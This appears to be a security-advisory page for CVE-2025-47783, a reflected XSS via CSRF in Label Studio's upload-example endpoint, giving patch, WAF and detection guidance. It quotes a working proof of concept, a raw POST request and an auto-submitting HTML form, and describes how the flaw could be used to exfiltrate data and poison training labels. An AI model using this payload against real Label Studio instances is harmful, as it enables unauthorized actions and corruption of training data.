CVE-2025-47783 — HIGH AI Security Vulnerability

Q: Is CVE-2025-47783 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-47783, increasing the risk of exploitation.

Q: How to fix CVE-2025-47783?

1. PATCH: Upgrade label-studio to >= 1.18.0 immediately. The fix adds proper Content-Type: application/json header to HttpResponse, preventing browser HTML interpretation. 2. NETWORK: If patching is delayed, add a WAF rule blocking POST requests to /projects/upload-example/ containing script tags or HTML entities (%3cscript, <script). 3. DETECTION: Review web server logs for POST requests to /projects/upload-example/ with label_config parameters containing HTML/script content. Alert on responses from that endpoint that include '<script' in the body. 4. VERIFY: Check Label Studio version across all environments: pip show label-studio | grep Version. 5. AWARENESS: Brief annotation teams not to click links in unsolicited emails referencing Label Studio projects—this is the primary CSRF delivery vector.

Q: What systems are affected by CVE-2025-47783?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, data annotation platforms, MLOps CI/CD pipelines, supervised learning workflows.

Q: What is the CVSS score for CVE-2025-47783?

No CVSS score has been assigned yet.

CISO Take

Label Studio deployments below 1.18.0 are vulnerable to reflected XSS via the label config upload endpoint, exploitable without authentication through a CSRF attack page sent to any logged-in user. Upgrade to 1.18.0 immediately; session cookies are http-only so direct session theft is blocked, but an attacker can still manipulate annotations, exfiltrate project data, or corrupt training datasets on behalf of the victim. If you cannot patch now, block external access to /projects/upload-example/ at the network perimeter.

Risk Assessment

MEDIUM-HIGH for organizations using Label Studio in internal annotation pipelines. The CSRF delivery vector means exploitation requires no credentials—just a victim with an active session clicking a link. The PoC is fully public and trivially weaponizable. However, the http-only cookie flag prevents session token theft, limiting the blast radius to in-session actions. Risk elevates significantly if Label Studio is internet-facing or shared across a large annotation team, as a single successful phish gives persistent in-browser code execution against that user's workspace.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
label-studio	pip	< 1.18.0	`1.18.0`
27.2K 1 dependents Pushed 8d ago 71% patched ~145d to patch Full package profile →

Do you use label-studio? You're affected.

Severity & Risk

CVSS 3.1

N/A

EPSS

0.2%

chance of exploitation in 30 days

Higher than 42% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Recommended Action

5 steps

PATCH

Upgrade label-studio to >= 1.18.0 immediately. The fix adds proper Content-Type: application/json header to HttpResponse, preventing browser HTML interpretation.
NETWORK

If patching is delayed, add a WAF rule blocking POST requests to /projects/upload-example/ containing script tags or HTML entities (%3cscript, <script).
DETECTION

Review web server logs for POST requests to /projects/upload-example/ with label_config parameters containing HTML/script content. Alert on responses from that endpoint that include '<script' in the body.
VERIFY

Check Label Studio version across all environments: pip show label-studio | grep Version.
AWARENESS

Brief annotation teams not to click links in unsolicited emails referencing Label Studio projects—this is the primary CSRF delivery vector.

CISA SSVC Assessment

Decision Attend

Exploitation poc

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Data Leakage Social Engineering Framework Training Data AML.T0011.003 - Malicious Link AML.T0020 - Poison Training Data AML.T0048.003 - User Harm AML.T0049 - Exploit Public-Facing Application AML.T0078 - Drive-by Compromise

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 10 - Data and data governance Article 9 - Risk management system

ISO 42001

A.6.1.4 - Security of AI system lifecycle A.6.2.4 - Data quality and integrity

NIST AI RMF

MANAGE 2.4 - Mechanisms for detecting and addressing AI risks MAP 5.1 - Likelihood and magnitude of risks

OWASP LLM Top 10

LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2025-47783?

Label Studio deployments below 1.18.0 are vulnerable to reflected XSS via the label config upload endpoint, exploitable without authentication through a CSRF attack page sent to any logged-in user. Upgrade to 1.18.0 immediately; session cookies are http-only so direct session theft is blocked, but an attacker can still manipulate annotations, exfiltrate project data, or corrupt training datasets on behalf of the victim. If you cannot patch now, block external access to /projects/upload-example/ at the network perimeter.

Is CVE-2025-47783 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2025-47783, increasing the risk of exploitation.

How to fix CVE-2025-47783?

1. PATCH: Upgrade label-studio to >= 1.18.0 immediately. The fix adds proper Content-Type: application/json header to HttpResponse, preventing browser HTML interpretation. 2. NETWORK: If patching is delayed, add a WAF rule blocking POST requests to /projects/upload-example/ containing script tags or HTML entities (%3cscript, <script). 3. DETECTION: Review web server logs for POST requests to /projects/upload-example/ with label_config parameters containing HTML/script content. Alert on responses from that endpoint that include '<script' in the body. 4. VERIFY: Check Label Studio version across all environments: pip show label-studio | grep Version. 5. AWARENESS: Brief annotation teams not to click links in unsolicited emails referencing Label Studio projects—this is the primary CSRF delivery vector.

What systems are affected by CVE-2025-47783?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, data annotation platforms, MLOps CI/CD pipelines, supervised learning workflows.

What is the CVSS score for CVE-2025-47783?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary The vulnerability allows an attacker to inject a malicious script into the context of a web page, which can lead to data theft, unauthorized actions on behalf of the user, and other attacks. ### Details The vulnerability is reproducible when sending a properly formatted request to the `POST /projects/upload-example/` endpoint. In the source code, the vulnerability is located at `label_studio/projects/views.py`. ```python 39: @require_http_methods(['POST']) 40: def upload_example_using_config(request): 41: """Generate upload data example by config only""" 42: config = request.POST.get('label_config', '') 43: 44: org_pk = get_organization_from_request(request) 45: secure_mode = False 46: if org_pk is not None: 47: org = generics.get_object_or_404(Organization, pk=org_pk) 48: secure_mode = org.secure_mode 49: 50: try: 51: Project.validate_label_config(config) 52: task_data, _, _ = get_sample_task(config, secure_mode) 53: task_data = playground_replacements(request, task_data) 54: except (ValueError, ValidationError, lxml.etree.Error): 55: response = HttpResponse('error while example generating', status=status.HTTP_400_BAD_REQUEST) 56: else: 57: response = HttpResponse(json.dumps(task_data)) 58: return response ``` The vulnerability is specifically located in line 57, where HttpResponse is used. ```python 57: response = HttpResponse(json.dumps(task_data)) ``` ### PoC Send the following request after changing the `{host}` to your own. ```css POST /projects/upload-example/ HTTP/1.1 Host: {host} Content-Type: application/x-www-form-urlencoded Content-Length: 67 label_config=%3cView%3e%3cText%20name%3d%22text%22%20value%3d%22$textjmwwi%26lt%3bscript%26gt%3balert(1)%26lt%3b%2fscript%26gt%3bs8m37%22%2f%3e%3c%2fView%3e ``` Or you can create a vulnerable HTML page by changing `{domain}` beforehand, which can later be sent to the victim. ```html <html> <body> <form action="http://{domain}/projects/upload-example/" method="POST"> <input type="hidden" name="label_config" value="<View><Text name="text" value="$textjmwwi&lt;script&gt;alert(1)&lt;/script&gt;s8m37"/></View>" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html> ``` ### Impact - Malicious code execution: The user may be forced to perform unwanted actions within their Label Studio account. This includes accessing `document.cookie`, but note that Label Studio session cookies are marked http-only, mitigating any possibility of session theft.

Exploitation Scenario

An adversary targeting an AI company's training pipeline identifies that the team uses Label Studio for NLP annotation. They craft a malicious HTML page that auto-submits a POST to the victim's Label Studio instance with a label_config payload embedding a JavaScript payload. The payload, on execution, calls the Label Studio API to export all annotation tasks to an attacker-controlled endpoint, then subtly modifies a sample of labels in a high-value project (e.g., flipping sentiment labels from positive to negative at a 5% rate). The attacker emails the page disguised as a vendor survey link to an annotation team member. The victim's browser executes the payload silently. The poisoned annotations flow into the next weekly training run undetected, degrading model performance on a targeted class without triggering obvious alerts.